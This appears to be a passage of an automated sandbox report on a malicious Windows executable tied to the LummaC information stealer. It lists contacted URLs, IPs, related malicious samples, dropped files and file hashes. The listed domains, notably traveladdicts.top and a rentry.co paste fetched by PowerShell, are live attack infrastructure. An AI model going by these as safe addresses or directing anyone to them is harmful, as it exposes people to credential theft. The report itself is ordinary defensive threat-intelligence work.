                                                                                        high
                                                                                        https://rentry.co/static/icons/270.png#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drfalse
                                                                                          high
                                                                                          https://www.ecosia.org/newtab/#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://rentry.co/static/icons/270.pnghZ#lxpowershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.microsoft.#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://ac.ecosia.org/autocomplete?q=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.micro#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                                                        high
                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://rentry.co/#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drfalse
                                                                                                            high
                                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                                                              high
                                                                                                              http://www.testlab2008.com/indices/submit.php?c=CD&i=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://support.microsof#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://traveladdicts.top/##Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://rentry.co/static/icons/270.pnghZ#lL1powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://traveladdicts.top/3#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://traveladdicts.top/4#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://rentry.co/hZ#lpowershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://rentry.co/static/icons/512.pnghZ#lXNpowershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            104.26.3.16
                                                                                                                            rentry.coUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            104.21.60.241
                                                                                                                            traveladdicts.topUnited States
                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                            Analysis ID:1601484
                                                                                                                            Start date and time:2025-01-28 16:14:47 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 6m 24s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:7
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@4/4@2/2
                                                                                                                            EGA Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 11
                                                                                                                            • Number of non-executed functions: 14
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.253.45
                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, PID 7412 because there are no executed function
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            TimeTypeDescription
                                                                                                                            10:15:57API Interceptor9x Sleep call for process: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            104.26.3.16#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                            grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeGet hashmaliciousXWormBrowse
                                                                                                                                                104.21.60.241Ken.skonicki Replay VM (01m32sec).docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  https://taf7.rphortan.com/xV5YqZuT/#Xjeffrey.laws@99restaurants.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                    phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      Ewhite Replay VM .docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                        https://deutsche-post-infos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          http://www.bccontractingco.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            http://mail.finance-asp4.comGet hashmaliciousUnknownBrowse
                                                                                                                                                              http://weatherchalk.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                https://analytics.webnorth.cloud/?module=Login&action=acceptInvitation&token=4e85c7ac842c08a74fec44d4668b7a9aGet hashmaliciousUnknownBrowse
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  traveladdicts.top#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 172.67.202.141
                                                                                                                                                                  rentry.co#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                  • 104.26.2.16
                                                                                                                                                                  atlantis4en.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.26.2.16
                                                                                                                                                                  #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.26.2.16
                                                                                                                                                                  #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  random.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 172.67.75.40
                                                                                                                                                                  XWorm RAT V2.1.exeGet hashmaliciousNjrat, XWormBrowse
                                                                                                                                                                  • 172.67.75.40
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  CLOUDFLARENETUS#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 172.67.202.141
                                                                                                                                                                  https://pub-6001c4a55cf84413a41e24da9a9d5948.r2.dev/OnDrive-%20complete%20with%20Docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                  Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                  https://share.hsforms.com/1_2WOdMKeTWCrk3shrRFEBQt7nc8Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 104.16.117.116
                                                                                                                                                                  Thegarden Benefit Memo.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.21.2.8
                                                                                                                                                                  PDFQOUTE COMFIRMATION pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                  MACHINE QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                  file_1737764438853.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                  WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.16.149.130
                                                                                                                                                                  WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.16.148.130
                                                                                                                                                                  CLOUDFLARENETUS#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 172.67.202.141
                                                                                                                                                                  https://pub-6001c4a55cf84413a41e24da9a9d5948.r2.dev/OnDrive-%20complete%20with%20Docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                  Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                  https://share.hsforms.com/1_2WOdMKeTWCrk3shrRFEBQt7nc8Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 104.16.117.116
                                                                                                                                                                  Thegarden Benefit Memo.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.21.2.8
                                                                                                                                                                  PDFQOUTE COMFIRMATION pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                  MACHINE QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                  file_1737764438853.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                  WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.16.149.130
                                                                                                                                                                  WebCompanionInstaller-12.901.5.1061-prod.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.16.148.130
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  vxaZNB3wGd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  k6JaohgQKp.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  a33kcGf1aA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  vxaZNB3wGd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  a33kcGf1aA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  cHAxMzM3_crypted_LAB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  REQUIRED-ORDER-REF.cmd.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  Racoona.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.26.3.16
                                                                                                                                                                  • 104.21.60.241
                                                                                                                                                                  No context
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                  Entropy (8bit):0.7307872139132228
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Nlllul4/X:NllU4/
                                                                                                                                                                  MD5:3C34689C4BD27F7A51A67BBD54FA65C2
                                                                                                                                                                  SHA1:E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
                                                                                                                                                                  SHA-256:4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
                                                                                                                                                                  SHA-512:02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:@...e.................................,.........................
                                                                                                                                                                  Process:C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (945)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4452
                                                                                                                                                                  Entropy (8bit):5.071274990406666
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:5q41lJM8WOxEj4/wPsAG4oevjKEcXrCnBBkpBxVGLrGWQ7aSTw2wptI8Id6Pu:5hPA5jKEcXrCnTkpBxFzanx/ICu
                                                                                                                                                                  MD5:3C3E3FB6161702F077D39BAE54AB780B
                                                                                                                                                                  SHA1:071F755A156ABC6FE4E6F9CD82D19A6CB3A72121
                                                                                                                                                                  SHA-256:5CB42D98FC867F8DA8E4F428707068E8D9D85227A6E01E4A172DC76BEA03EC1B
                                                                                                                                                                  SHA-512:23941EBDCCFF8EB59424D97E669BFAF6FF2C1EC575E70E5F42C9B4230DB441872B2C68B2B9C4797C6D2467536DDB0E5B3A4B2B1518B4F0767B83A0E7013CBF7A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview:<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>Error</title>.. . <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free.">. <meta name="keywords" content="paste, markdown, publishing, markdown paste, markdown from command line">.. <meta name="twitter:card" content="summary" />. <meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />. <meta name="twitter:title" content="Rentry.co - Markdown Paste" />. <meta name="twitter:site" content="@rentry_co" />. <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />.. <meta property="og:url" content="https://rentry.co/" />. <meta property="og:title" content="Rentry.co - Markdown Paste Service" />. <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />. <meta property="og:image" content="https://rentr
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):4.291433707311005
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                  File name:#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  File size:79'325'044 bytes
                                                                                                                                                                  MD5:f86c1fb3a2c034c4d3d44a96fd9d6093
                                                                                                                                                                  SHA1:eb478a69bc15b156a9ea0f0276e72788426b5b9e
                                                                                                                                                                  SHA256:10216641566ad9478b8aa7af136ee17959c8a4597b663ae379647f437f91f220
                                                                                                                                                                  SHA512:8635eebd4dc351856804f7d310d7ba6b7802def8f1ef63590dd62d8f547947c76abc4f7b0364f3f43a0b5b735cbb9aa9a50106f34f3715256a7eefa69a663ab3
                                                                                                                                                                  SSDEEP:24576:XrIWzIGJHrHPcf6ZzI5SuxumqUQk0+xBFQbtLlDy/pyy/pNNx4/rdnfRSnJ89d/b:XN7JbTIAtRe/P//2rdfLd/k12jzL
                                                                                                                                                                  TLSH:02088479AB1013E55F8399CE4E07E7D6EE6DD1107212246CA28F068BDA438EC4377D6E
                                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                  Icon Hash:5fc1c131094d9e07
                                                                                                                                                                  Entrypoint:0x463c48
                                                                                                                                                                  Entrypoint Section:CODE
                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:1
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:1
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:1
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:92db50972771bbc9741d8dba3b89adb3
